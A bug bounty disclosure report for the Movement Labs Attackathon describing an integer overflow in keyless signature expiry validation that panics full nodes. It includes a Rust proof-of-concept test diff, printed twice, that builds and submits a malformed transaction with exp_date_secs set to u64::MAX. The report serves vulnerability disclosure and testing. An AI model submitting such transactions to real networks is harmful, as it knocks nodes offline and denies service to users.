#42934 [BC-High] Improper input validation in KeylessSignature causes full-node panic

Submitted on Mar 29th 2025 at 18:16:50 UTC by @dustincha for Attackathon | Movement Labs

Report ID: #42934
Report Type: Blockchain/DLT
Report severity: High
Target: https://github.com/immunefi-team/attackathon-movement-aptos-core/tree/main
Impacts:
- Shutdown of greater than or equal to 30% of network processing nodes without brute force actions, but does not shut down the network

Description

Brief/Intro

The KeylessSignature implementation lacks proper input validation for certain fields. This allows an attacker to craft a malicious transaction that, when submitted to the Movement network, causes all full nodes to panic. The attack requires no special privileges—only a minimal amount of funds to cover transaction fees. By leveraging the Movement SDK, an attacker can easily submit the malformed transaction. Once triggered, the attack causes a complete halt of the network: full nodes become unresponsive, and no further transactions can be processed.

Vulnerability Details

The vulnerability is in how keyless signatures are validated. Specifically:

https://github.com/immunefi-team/attackathon-movement-aptos-core/blob/627b4f9e0b63c33746fa5dae6cd672cbee3d8631/aptos-move/aptos-vm/src/keyless_validation.rs#L165

 sig.verify_expiry(&onchain_timestamp_obj).map_err(|_| {

sig is the transaction signature defined as a KeylessSignature type

https://github.com/immunefi-team/attackathon-movement-aptos-core/blob/627b4f9e0b63c33746fa5dae6cd672cbee3d8631/types/src/keyless/mod.rs#L151

let expiry_time = seconds_from_epoch(self.exp_date_secs);

exp_date_secs is fully attacker-controlled.

https://github.com/immunefi-team/attackathon-movement-aptos-core/blob/627b4f9e0b63c33746fa5dae6cd672cbee3d8631/types/src/keyless/mod.rs#L369 --> Integer overflow during the calculation

Submitting malformed KeylessSignature data via a transaction leads to a panic during validation.

Impact Details

All full nodes panic and stop processing transactions

Proof of Concept

To demonstrate the vulnerability, apply the included git diff which adds a failing test using a malformed KeylessSignature.

This patch adds a test named test_keyless_tx that constructs and submits a malformed keyless transaction. When processed, it triggers a panic in the node.

git apply poc.diff
cd networks/movement/movement-client/
cargo test test_keyless_tx -- --nocapture

poc.diff:

diff --git a/networks/movement/movement-client/src/tests/mod.rs b/networks/movement/movement-client/src/tests/mod.rs
index 0800555f8..e4a29cf2d 100644
--- a/networks/movement/movement-client/src/tests/mod.rs
+++ b/networks/movement/movement-client/src/tests/mod.rs
@@ -1,34 +1,57 @@
 // pub mod alice_bob;
 pub mod indexer_stream;
-use crate::load_soak_testing::{execute_test, init_test, ExecutionConfig, Scenario, TestKind};
+
 use crate::{
 	coin_client::CoinClient,
+	load_soak_testing::{execute_test, init_test, ExecutionConfig, Scenario, TestKind},
 	rest_client::{
 		aptos_api_types::{TransactionOnChainData, ViewFunction},
 		Client, FaucetClient,
 	},
 	transaction_builder::TransactionBuilder,
-	types::{chain_id::ChainId, LocalAccount},
 };
+
+use aptos_sdk::{
+	crypto::{
+		ed25519::{Ed25519PrivateKey, Ed25519PublicKey},
+		PrivateKey, SigningKey, Uniform, ValidCryptoMaterialStringExt,
+	},
+	move_types::{
+		identifier::Identifier,
+		language_storage::{ModuleId, TypeTag},
+	},
+	types::{
+		account_address::AccountAddress,
+		chain_id::ChainId,
+		keyless::{
+			EphemeralCertificate, IdCommitment, KeylessPublicKey, KeylessSignature, OpenIdSig,
+			Pepper, TransactionAndProof,
+		},
+		transaction::{
+			authenticator::{
+				AccountAuthenticator, AnyPublicKey, AnySignature, AuthenticationKey,
+				EphemeralPublicKey, EphemeralSignature, SingleKeyAuthenticator,
+				TransactionAuthenticator,
+			},
+			EntryFunction, RawTransaction, Script, SignedTransaction, TransactionPayload,
+		},
+		LocalAccount,
+	},
+};
+
 use anyhow::Context;
-use aptos_sdk::crypto::ed25519::Ed25519PrivateKey;
-use aptos_sdk::crypto::ValidCryptoMaterialStringExt;
-use aptos_sdk::move_types::identifier::Identifier;
-use aptos_sdk::move_types::language_storage::ModuleId;
-use aptos_sdk::types::account_address::AccountAddress;
-use aptos_sdk::types::transaction::authenticator::AuthenticationKey;
-use aptos_sdk::types::transaction::EntryFunction;
-use aptos_sdk::types::transaction::TransactionPayload;
-use aptos_sdk::{crypto::ed25519::Ed25519PublicKey, move_types::language_storage::TypeTag};
 use buildtime_helpers::cargo::cargo_workspace;
 use commander::run_command;
 use once_cell::sync::Lazy;
 use serde::{de::DeserializeOwned, Deserialize};
-use std::path::PathBuf;
-use std::str::FromStr;
-use std::time::{SystemTime, UNIX_EPOCH};
-use std::{fs, sync::Arc};
-use std::{thread, time};
+use std::{
+	fs,
+	path::PathBuf,
+	str::FromStr,
+	sync::Arc,
+	thread,
+	time::{self, SystemTime, UNIX_EPOCH},
+};
 use url::Url;
 
 static SUZUKA_CONFIG: Lazy<movement_config::Config> = Lazy::new(|| {
@@ -185,6 +208,130 @@ async fn test_example_interaction() -> Result<(), anyhow::Error> {
 	Ok(())
 }
 
+#[tokio::test]
+async fn test_keyless_tx() -> Result<(), anyhow::Error> {
+	let rest_client = Client::new(NODE_URL.clone());
+	let faucet_client = FaucetClient::new(FAUCET_URL.clone(), NODE_URL.clone());
+	let coin_client = CoinClient::new(&rest_client);
+
+	// Create Alice's account
+	let mut alice = LocalAccount::generate(&mut rand::rngs::OsRng);
+
+	// Fund Alice's account
+	faucet_client
+		.fund(alice.address(), 100_000_000)
+		.await
+		.context("Failed to fund Alice's account")?;
+
+	// Print initial balance
+	println!("\n=== Initial Balance ===");
+	println!(
+		"Alice: {:?}",
+		coin_client
+			.get_account_balance(&alice.address())
+			.await
+			.context("Failed to get Alice's account balance")?
+	);
+
+	// Exploit from here
+
+	// Set up transaction parameters
+	let max_gas_amount: u64 = 5_000;
+	let gas_unit_price: u64 = 100;
+	let timeout_secs: u64 = 10;
+	let chain_id = ChainId::new(4); // Adjust chain ID as needed
+
+	let expiration_timestamp_secs = SystemTime::now()
+		.duration_since(UNIX_EPOCH)
+		.unwrap()
+		.as_secs()
+		+ timeout_secs;
+
+	// Build transaction payload
+	let payload = TransactionPayload::Script(Script::new(vec![0], vec![], vec![]));
+
+	// Create raw transaction
+	let raw_txn = RawTransaction::new(
+		alice.address(),
+		alice.sequence_number(),
+		payload,
+		max_gas_amount,
+		gas_unit_price,
+		expiration_timestamp_secs,
+		chain_id,
+	);
+
+	// Set up keyless public key
+	let any_public_key = AnyPublicKey::Keyless {
+		public_key: KeylessPublicKey {
+			iss_val: "test.oidc.provider".to_string(),
+			idc: IdCommitment::new_from_preimage(
+				&Pepper::from_number(0x1337),
+				"aud",
+				"uid_key",
+				"uid_val",
+			)
+			.expect("Failed to create IdCommitment"),
+		},
+	};
+
+	// Create transaction and proof container
+	let txn_and_proof = TransactionAndProof {
+		message: raw_txn.clone(),
+		proof: None,
+	};
+
+	// Generate test keys and signature
+	let private_key = Ed25519PrivateKey::generate_for_testing();
+	let public_key: Ed25519PublicKey = private_key.public_key();
+	let signature = private_key
+		.sign(&txn_and_proof)
+		.expect("Failed to sign raw_txn");
+
+	// Create keyless signature for attack0
+	let any_signature = AnySignature::Keyless {
+		signature: KeylessSignature {
+			cert: EphemeralCertificate::OpenIdSig(OpenIdSig {
+				jwt_sig: vec![],
+				jwt_payload_json: "jwt_payload_json".to_string(),
+				uid_key: "uid_key".to_string(),
+				epk_blinder: b"epk_blinder".to_vec(),
+				pepper: Pepper::from_number(0x1337),
+				idc_aud_val: None,
+			}),
+			jwt_header_json: "jwt_header_json".to_string(),
+			exp_date_secs: u64::MAX, // Overflow here
+			ephemeral_pubkey: EphemeralPublicKey::ed25519(public_key),
+			ephemeral_signature: EphemeralSignature::ed25519(signature),
+		},
+	};
+
+	// Build an authenticator
+	let authenticator = TransactionAuthenticator::SingleSender {
+		sender: AccountAuthenticator::SingleKey {
+			authenticator: SingleKeyAuthenticator::new(any_public_key, any_signature),
+		},
+	};
+
+	// Create and submit the signed transaction
+	let signed_transaction = SignedTransaction::new_signed_transaction(raw_txn, authenticator);
+	rest_client
+		.submit(&signed_transaction)
+		.await
+		.context("Submit failed")?;
+
+	println!("\n=== Try to get balance after exploit ===");
+	println!(
+		"Alice: {:?}",
+		coin_client
+			.get_account_balance(&alice.address())
+			.await
+			.context("Failed to get Alice's account balance")?
+	);
+
+	Ok(())
+}
+
 #[derive(Debug, Deserialize)]
 struct Config {
 	profiles: Profiles,

Previous#42933 [BC-Medium] Integer Underflow in Garbage Collection Logic of UsedSequenceNumberPool disrupting transaction processing Next#42936 [BC-Critical] Potential Deadlock or Panic Due to Concurrent Lock Acquisition in `TransactionPipe`

Was this helpful?

diff --git a/networks/movement/movement-client/src/tests/mod.rs b/networks/movement/movement-client/src/tests/mod.rs index 0800555f8..e4a29cf2d 100644 --- a/networks/movement/movement-client/src/tests/mod.rs +++ b/networks/movement/movement-client/src/tests/mod.rs @@ -1,34 +1,57 @@ // pub mod alice_bob; pub mod indexer_stream; -use crate::load_soak_testing::{execute_test, init_test, ExecutionConfig, Scenario, TestKind}; + use crate::{ coin_client::CoinClient, + load_soak_testing::{execute_test, init_test, ExecutionConfig, Scenario, TestKind}, rest_client::{ aptos_api_types::{TransactionOnChainData, ViewFunction}, Client, FaucetClient, }, transaction_builder::TransactionBuilder, - types::{chain_id::ChainId, LocalAccount}, }; + +use aptos_sdk::{ + crypto::{ + ed25519::{Ed25519PrivateKey, Ed25519PublicKey}, + PrivateKey, SigningKey, Uniform, ValidCryptoMaterialStringExt, + }, + move_types::{ + identifier::Identifier, + language_storage::{ModuleId, TypeTag}, + }, + types::{ + account_address::AccountAddress, + chain_id::ChainId, + keyless::{ + EphemeralCertificate, IdCommitment, KeylessPublicKey, KeylessSignature, OpenIdSig, + Pepper, TransactionAndProof, + }, + transaction::{ + authenticator::{ + AccountAuthenticator, AnyPublicKey, AnySignature, AuthenticationKey, + EphemeralPublicKey, EphemeralSignature, SingleKeyAuthenticator, + TransactionAuthenticator, + }, + EntryFunction, RawTransaction, Script, SignedTransaction, TransactionPayload, + }, + LocalAccount, + }, +}; + use anyhow::Context; -use aptos_sdk::crypto::ed25519::Ed25519PrivateKey; -use aptos_sdk::crypto::ValidCryptoMaterialStringExt; -use aptos_sdk::move_types::identifier::Identifier; -use aptos_sdk::move_types::language_storage::ModuleId; -use aptos_sdk::types::account_address::AccountAddress; -use aptos_sdk::types::transaction::authenticator::AuthenticationKey; -use aptos_sdk::types::transaction::EntryFunction; -use aptos_sdk::types::transaction::TransactionPayload; -use aptos_sdk::{crypto::ed25519::Ed25519PublicKey, move_types::language_storage::TypeTag}; use buildtime_helpers::cargo::cargo_workspace; use commander::run_command; use once_cell::sync::Lazy; use serde::{de::DeserializeOwned, Deserialize}; -use std::path::PathBuf; -use std::str::FromStr; -use std::time::{SystemTime, UNIX_EPOCH}; -use std::{fs, sync::Arc}; -use std::{thread, time}; +use std::{ + fs, + path::PathBuf, + str::FromStr, + sync::Arc, + thread, + time::{self, SystemTime, UNIX_EPOCH}, +}; use url::Url; static SUZUKA_CONFIG: Lazy<movement_config::Config> = Lazy::new(|| { @@ -185,6 +208,130 @@ async fn test_example_interaction() -> Result<(), anyhow::Error> { Ok(()) } +#[tokio::test] +async fn test_keyless_tx() -> Result<(), anyhow::Error> { + let rest_client = Client::new(NODE_URL.clone()); + let faucet_client = FaucetClient::new(FAUCET_URL.clone(), NODE_URL.clone()); + let coin_client = CoinClient::new(&rest_client); + + // Create Alice's account + let mut alice = LocalAccount::generate(&mut rand::rngs::OsRng); + + // Fund Alice's account + faucet_client + .fund(alice.address(), 100_000_000) + .await + .context("Failed to fund Alice's account")?; + + // Print initial balance + println!("\n=== Initial Balance ==="); + println!( + "Alice: {:?}", + coin_client + .get_account_balance(&alice.address()) + .await + .context("Failed to get Alice's account balance")? + ); + + // Exploit from here + + // Set up transaction parameters + let max_gas_amount: u64 = 5_000; + let gas_unit_price: u64 = 100; + let timeout_secs: u64 = 10; + let chain_id = ChainId::new(4); // Adjust chain ID as needed + + let expiration_timestamp_secs = SystemTime::now() + .duration_since(UNIX_EPOCH) + .unwrap() + .as_secs() + + timeout_secs; + + // Build transaction payload + let payload = TransactionPayload::Script(Script::new(vec![0], vec![], vec![])); + + // Create raw transaction + let raw_txn = RawTransaction::new( + alice.address(), + alice.sequence_number(), + payload, + max_gas_amount, + gas_unit_price, + expiration_timestamp_secs, + chain_id, + ); + + // Set up keyless public key + let any_public_key = AnyPublicKey::Keyless { + public_key: KeylessPublicKey { + iss_val: "test.oidc.provider".to_string(), + idc: IdCommitment::new_from_preimage( + &Pepper::from_number(0x1337), + "aud", + "uid_key", + "uid_val", + ) + .expect("Failed to create IdCommitment"), + }, + }; + + // Create transaction and proof container + let txn_and_proof = TransactionAndProof { + message: raw_txn.clone(), + proof: None, + }; + + // Generate test keys and signature + let private_key = Ed25519PrivateKey::generate_for_testing(); + let public_key: Ed25519PublicKey = private_key.public_key(); + let signature = private_key + .sign(&txn_and_proof) + .expect("Failed to sign raw_txn"); + + // Create keyless signature for attack0 + let any_signature = AnySignature::Keyless { + signature: KeylessSignature { + cert: EphemeralCertificate::OpenIdSig(OpenIdSig { + jwt_sig: vec![], + jwt_payload_json: "jwt_payload_json".to_string(), + uid_key: "uid_key".to_string(), + epk_blinder: b"epk_blinder".to_vec(), + pepper: Pepper::from_number(0x1337), + idc_aud_val: None, + }), + jwt_header_json: "jwt_header_json".to_string(), + exp_date_secs: u64::MAX, // Overflow here + ephemeral_pubkey: EphemeralPublicKey::ed25519(public_key), + ephemeral_signature: EphemeralSignature::ed25519(signature), + }, + }; + + // Build an authenticator + let authenticator = TransactionAuthenticator::SingleSender { + sender: AccountAuthenticator::SingleKey { + authenticator: SingleKeyAuthenticator::new(any_public_key, any_signature), + }, + }; + + // Create and submit the signed transaction + let signed_transaction = SignedTransaction::new_signed_transaction(raw_txn, authenticator); + rest_client + .submit(&signed_transaction) + .await + .context("Submit failed")?; + + println!("\n=== Try to get balance after exploit ==="); + println!( + "Alice: {:?}", + coin_client + .get_account_balance(&alice.address()) + .await + .context("Failed to get Alice's account balance")? + ); + + Ok(()) +} + #[derive(Debug, Deserialize)] struct Config { profiles: Profiles,